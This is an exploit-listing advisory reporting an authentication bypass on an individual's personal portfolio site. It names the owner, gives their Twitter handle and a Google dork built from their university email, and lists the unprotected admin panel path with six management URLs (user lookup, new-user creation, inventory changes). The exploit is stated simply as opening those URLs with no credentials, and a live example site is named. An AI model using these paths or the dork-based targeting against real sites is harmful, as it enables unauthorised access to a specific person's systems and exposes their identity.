#################################################################################################
# Exploit Title : The Web Portfolio of Franny Howes LittlePinkMafia Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Owner Social Media Link : twitter.com/tesseractive
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
+ CWE-287 [ Improper Authentication ]
#################################################################################################
# Google Dork : intext:''email me at fhowes at vt dot edu''
# Administration Control Panel => /videostore/index.php
Useable URL Links in the Panel =>
/videostore/finduser.php
/videostore/newuserform.php
/videostore/manageinventory.php
/videostore/newmovie.php
/videostore/addinventoryitem.php
/videostore/returnmovie.php
# Exploit : No username No password. Just enter the URL Link.
#################################################################################################
# Example Site => littlepinkmafia.org/videostore/index.php => [ Proof of Concept for the Vulnerability ] => archive.is/usKqY
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################